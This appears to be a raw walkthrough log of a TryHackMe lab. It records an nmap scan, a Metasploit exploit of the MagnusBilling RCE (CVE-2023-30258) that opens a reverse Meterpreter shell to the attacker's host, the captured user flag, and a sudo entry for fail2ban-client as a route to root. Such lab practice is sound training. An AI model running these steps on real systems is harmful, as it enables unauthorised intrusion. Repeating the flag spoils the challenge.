Nmap
root@ip-10-10-5-83:~# nmap -sV -p- -Pn 10.10.240.98
Starting Nmap 7.80 ( <https://nmap.org> ) at 2025-06-26 14:18 BST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 14:18 (0:00:02 remaining)
Nmap scan report for ip-10-10-240-98.eu-west-1.compute.internal (10.10.240.98)
Host is up (0.00021s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
3306/tcp open mysql MariaDB (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
MAC Address: 02:0E:AF:EC:F2:FB (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds
Website
MSFconsole
msf6 > search magnusbilling
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \\_ target: PHP . . . .
2 \\_ target: Unix Command . . . .
3 \\_ target: Linux Dropper . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit>
.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0
.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS 10.10.240.98
RHOSTS => 10.10.240.98
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.10.11.165
LHOST => 10.10.11.165
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.11.165:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.240.98:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.29 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.240.98
[+] Deleted YKavsSSitm.php
[*] Meterpreter session 1 opened (10.10.11.165:4444 -> 10.10.240.98:40470) at 2025-06-26 14:56:22 +0100
ls
meterpreter > ls
Listing: /var/www/html/mbilling/lib/icepay
==========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100700/rwx------ 768 fil 2024-02-27 19:44:28 +0000 icepay-cc.php
100700/rwx------ 733 fil 2024-02-27 19:44:28 +0000 icepay-ddebit.php
100700/rwx------ 736 fil 2024-02-27 19:44:28 +0000 icepay-directebank.php
100700/rwx------ 730 fil 2024-02-27 19:44:28 +0000 icepay-giropay.php
100700/rwx------ 671 fil 2024-02-27 19:44:28 +0000 icepay-ideal.php
100700/rwx------ 720 fil 2024-02-27 19:44:28 +0000 icepay-mistercash.php
100700/rwx------ 710 fil 2024-02-27 19:44:28 +0000 icepay-paypal.php
100700/rwx------ 699 fil 2024-02-27 19:44:28 +0000 icepay-paysafecard.php
100700/rwx------ 727 fil 2024-02-27 19:44:28 +0000 icepay-phone.php
100700/rwx------ 723 fil 2024-02-27 19:44:28 +0000 icepay-sms.php
100700/rwx------ 699 fil 2024-02-27 19:44:28 +0000 icepay-wire.php
100700/rwx------ 25097 fil 2024-03-27 19:55:23 +0000 icepay.php
100644/rw-r--r-- 0 fil 2024-09-13 10:17:00 +0100 null
meterpreter >
meterpreter > ls
Listing: /home/magnus
=====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2025-06-26 14:56:19 +0100 .bash_history
100600/rw------- 220 fil 2024-03-27 19:45:39 +0000 .bash_logout
100600/rw------- 3526 fil 2024-03-27 19:45:39 +0000 .bashrc
040700/rwx------ 4096 dir 2024-09-09 13:01:09 +0100 .cache
040700/rwx------ 4096 dir 2024-03-27 19:47:04 +0000 .config
040700/rwx------ 4096 dir 2024-09-09 13:01:09 +0100 .gnupg
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 .local
100700/rwx------ 807 fil 2024-03-27 19:45:39 +0000 .profile
040700/rwx------ 4096 dir 2024-03-27 19:46:17 +0000 .ssh
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Desktop
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Documents
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Downloads
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Music
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Pictures
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Public
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Templates
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Videos
100644/rw-r--r-- 38 fil 2024-03-27 21:44:18 +0000 user.txt
meterpreter > cat user.txt
THM{4a6831d5f124b25eefb1e92e0f0da4ca}
sudo -l
Matching Defaults entries for asterisk on ip-10-10-240-98:
env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-240-98:
(ALL) NOPASSWD: /usr/bin/fail2ban-client